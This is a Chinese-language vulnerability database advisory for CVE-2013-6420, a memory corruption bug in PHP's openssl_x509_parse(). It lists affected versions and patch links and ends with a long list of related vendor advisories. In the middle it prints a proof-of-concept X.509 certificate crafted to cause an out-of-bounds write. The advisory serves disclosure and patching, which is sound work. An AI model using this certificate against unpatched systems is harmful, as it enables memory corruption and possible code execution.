Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:61173
HistoryDec 18, 2013 - 12:00 a.m.

PHP OpenSSL Extension 'openssl_x509_parse()'内存破坏漏洞

2013-12-1800:00:00
Root
www.seebug.org
72

0.943 High

EPSS

Percentile

99.0%

JSON

BUGTRAQ ID: 64225
CVE(CAN) ID: CVE-2013-6420

PHP 5.3.27之前版本、5.4.22之前版本、5.5.6之前版本解析x.509证书时,"asn1_time_to_time_t()"函数(ext/openssl/openssl.c)出错,攻击者通过特制的x.509证书利用此漏洞可破坏内存。
0
PHP PHP 5.5.x
PHP PHP 5.4.x
PHP PHP 5.3.x
厂商补丁:

PHP

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net

http://www.php.net/downloads.php
http://git.php.net/?p=php-src.git;a=commitdiff;h=c1224573c773b6845e83505f717fbf820fc18415
http://git.php.net/?p=php-src.git;a=blobdiff;f=NEWS;h=8abf65e05b0298a6f2dba9439c9513919234766f;hp=70461d97d85c65e01e739514923303b09257f65f;hb=c1224573c773b6845e83505f717fbf820fc18415;hpb=32873cd0ddea7df8062213bb025beb6fb070e59d


                                                Proof of Concept:
 
  The following x509 certificate demonstrates the out of bounds write:
  
  -----BEGIN CERTIFICATE-----
  MIIEpDCCA4ygAwIBAgIJAJzu8r6u6eBcMA0GCSqGSIb3DQEBBQUAMIHDMQswCQYD
  VQQGEwJERTEcMBoGA1UECAwTTm9yZHJoZWluLVdlc3RmYWxlbjEQMA4GA1UEBwwH
  S8ODwrZsbjEUMBIGA1UECgwLU2VrdGlvbkVpbnMxHzAdBgNVBAsMFk1hbGljaW91
  cyBDZXJ0IFNlY3Rpb24xITAfBgNVBAMMGG1hbGljaW91cy5zZWt0aW9uZWlucy5k
  ZTEqMCgGCSqGSIb3DQEJARYbc3RlZmFuLmVzc2VyQHNla3Rpb25laW5zLmRlMHUY
  ZDE5NzAwMTAxMDAwMDAwWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAXDTE0MTEyODExMzkzNVowgcMxCzAJBgNVBAYTAkRFMRwwGgYDVQQIDBNO
  b3JkcmhlaW4tV2VzdGZhbGVuMRAwDgYDVQQHDAdLw4PCtmxuMRQwEgYDVQQKDAtT
  ZWt0aW9uRWluczEfMB0GA1UECwwWTWFsaWNpb3VzIENlcnQgU2VjdGlvbjEhMB8G
  A1UEAwwYbWFsaWNpb3VzLnNla3Rpb25laW5zLmRlMSowKAYJKoZIhvcNAQkBFhtz
  dGVmYW4uZXNzZXJAc2VrdGlvbmVpbnMuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IB
  DwAwggEKAoIBAQDDAf3hl7JY0XcFniyEJpSSDqn0OqBr6QP65usJPRt/8PaDoqBu
  wEYT/Na+6fsgPjC0uK9DZgWg2tHWWoanSblAMoz5PH6Z+S4SHRZ7e2dDIjPjdhjh
  0mLg2UMO5yp0V797Ggs9lNt6JRfH81MN2obXWs4NtztLMuD6egqpr8dDbr34aOs8
  pkdui5UawTZksy5pLPHq5cMhFGm06v65CLo0V2Pd9+KAokPrPcN5KLKebz7mLpk6
  SMeEXOKP4idEqxyQ7O7fBuHMedsQhu+prY3si3BUyKfQtP5CZnX2bp0wKHxX12DX
  1nfFIt9DbGvHTcyOuN+nZLPBm3vWxntyIIvVAgMBAAGjQjBAMAkGA1UdEwQCMAAw
  EQYJYIZIAYb4QgEBBAQDAgeAMAsGA1UdDwQEAwIFoDATBgNVHSUEDDAKBggrBgEF
  BQcDAjANBgkqhkiG9w0BAQUFAAOCAQEAG0fZYYCTbdj1XYc+1SnoaPR+vI8C8CaD
  8+0UYhdnyU4gga0BAcDrY9e94eEAu6ZqycF6FjLqXXdAboppWocr6T6GD1x33Ckl
  VArzG/KxQohGD2JeqkhIMlDomxHO7ka39+Oa8i2vWLVyjU8AZvWMAruHa4EENyG7
  lW2AagaFKFCr9TnXTfrdxGVEbv7KVQ6bdhg5p5SjpWH1+Mq03uR3ZXPBYdyV8319
  o0lVj1KFI2DCL/liWisJRoof+1cR35Ctd0wYBcpB6TZslMcOPl76dwKwJgeJo2Qg
  Zsfmc2vC1/qOlNuNq/0TzzkVGv8ETT3CgaU+UXe4XOVvkccebJn2dg==
  -----END CERTIFICATE-----

Related

checkpoint_advisories 1
openvas 56
redhat 6
nessus 35
seebug 1
packetstorm 1
veracode 1
cve 1
fedora 24
zdt 2
amazon 3
oraclelinux 2
f5 2
securityvulns 8
exploitpack 1
prion 1
freebsd 1
slackware 1
hackerone 1
centos 2
ubuntucve 1
exploitdb 1
osv 1
debian 1
mageia 1
ubuntu 1
suse 2
ibm 4
kaspersky 1
gentoo 1
checkpoint_advisories
checkpoint_advisories
PHP OpenSSL Extension X.509 Certificate Memory Corruption (CVE-2013-6420)
2013-12-26 00:00:00
openvas
openvas
Oracle Linux Local Check: ELSA-2013-1813
2015-10-06 00:00:00
CentOS Update for php CESA-2013:1813 centos6
2013-12-17 00:00:00
CentOS Update for php53 CESA-2013:1813 centos5
2013-12-17 00:00:00
redhat
redhat
(RHSA-2013:1825) Critical: php53 security update
2013-12-11 00:00:00
(RHSA-2013:1813) Critical: php53 and php security update
2013-12-11 00:00:00
(RHSA-2013:1826) Critical: php security update
2013-12-12 00:00:00
nessus
nessus
Amazon Linux AMI : php (ALAS-2013-262)
2013-12-23 00:00:00
Scientific Linux Security Update : php53 and php on SL5.x, SL6.x i386/x86_64 (20131211)
2013-12-12 00:00:00
CentOS 5 / 6 : php / php53 (CESA-2013:1813)
2013-12-12 00:00:00
seebug
seebug
PHP openssl_x509_parse() - Memory Corruption Vulnerability
2014-07-01 00:00:00
packetstorm
packetstorm
PHP openssl_x509_parse() Memory Corruption
2013-12-15 00:00:00
veracode
veracode
Remote Code Execution (RCE)
2019-01-15 08:53:15
cve
cve
CVE-2013-6420
2013-12-17 04:46:00
fedora
fedora
[SECURITY] Fedora 20 Update: php-5.5.7-1.fc20
2013-12-20 02:06:02
[SECURITY] Fedora 20 Update: php-5.5.12-1.fc20
2014-05-06 03:27:27
[SECURITY] Fedora 20 Update: php-5.5.11-1.fc20
2014-04-15 15:57:56
zdt
zdt
PHP openssl_x509_parse() Memory Corruption Vulnerability
2013-12-16 00:00:00
PHP openssl_x509_parse() Memory Corruption Vulnerability
2013-12-17 00:00:00
amazon
amazon
Critical: php54
2013-12-17 21:29:00
Critical: php
2013-12-17 21:29:00
Critical: php55
2013-12-17 21:29:00
oraclelinux
oraclelinux
php53 and php security update
2013-12-10 00:00:00
php security update
2013-12-10 00:00:00
f5
f5
SOL15110 - PHP Vulnerability CVE-2013-6420
2014-03-27 00:00:00
K15110 : PHP Vulnerability CVE-2013-6420
2014-05-23 00:00:00
securityvulns
securityvulns
PHP memory corruption
2013-12-30 00:00:00
[ MDVSA-2013:298 ] php
2013-12-24 00:00:00
Advisory 01/2013: PHP openssl_x509_parse() Memory Corruption Vulnerability
2013-12-30 00:00:00
exploitpack
exploitpack
PHP - openssl_x509_parse() Memory Corruption
2013-12-17 00:00:00
prion
prion
Memory corruption
2013-12-17 04:46:00
freebsd
freebsd
PHP5 -- memory corruption in openssl_x509_parse()
2013-12-13 00:00:00
slackware
slackware
php
2014-01-13 22:30:32
hackerone
hackerone
Internet Bug Bounty: PHP openssl_x509_parse() Memory Corruption Vulnerability
2013-11-30 23:00:00
centos
centos
php, php53 security update
2013-12-11 09:25:38
php security update
2013-12-11 09:34:01
ubuntucve
ubuntucve
CVE-2013-6420
2013-12-11 00:00:00
exploitdb
exploitdb
PHP - 'openssl_x509_parse()' Memory Corruption
2013-12-17 00:00:00
osv
osv
php5 - several
2013-12-12 00:00:00
debian
debian
[SECURITY] [DSA 2816-1] php5 security update
2013-12-12 21:18:13
mageia
mageia
Updated php packages fix multiple security vulnerabilities
2013-12-20 01:08:56
ubuntu
ubuntu
PHP vulnerabilities
2013-12-12 00:00:00
suse
suse
Security update for PHP5 (important)
2014-07-07 19:04:42
Security update for PHP5 (important)
2014-07-05 02:05:05
ibm
ibm
Security Bulletin: Vulnerabilities in PHP affect IBM Chassis Management Module (CMM) (CVE-2013-4248, CVE-2013-6420, CVE-2014-2497, CVE-2014-4049)
2019-01-31 01:55:01
Security Bulletin: Vulnerabilities in php5 affect IBM Flex System Manager (FSM): (CVE-2013-4248 CVE-2013-6420 CVE-2014-2497 CVE-2014-4049)
2019-01-31 01:30:01
Security Bulletin: Network Intrusion Prevention System is affected by curl and php5 vulnerabilities (CVE-2013-2174, CVE-2014-0015, CVE-2014-0138, CVE-2014-0139, CVE-2013-4248, CVE-2013-6420, CVE-2014-2497, CVE-2014-4049)
2022-02-23 17:14:38
kaspersky
kaspersky
KLA10458 Multiple vulnerabilities in HP SMH
2014-01-10 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2014-08-29 00:00:00

0.943 High

EPSS

Percentile

99.0%

JSON
Related for SSV:61173
checkpoint_advisories1openvas56redhat6nessus35seebug1packetstorm1veracode1cve1fedora24zdt2amazon3oraclelinux2f52securityvulns8exploitpack1prion1freebsd1slackware1hackerone1centos2ubuntucve1exploitdb1osv1debian1mageia1ubuntu1suse2ibm4kaspersky1gentoo1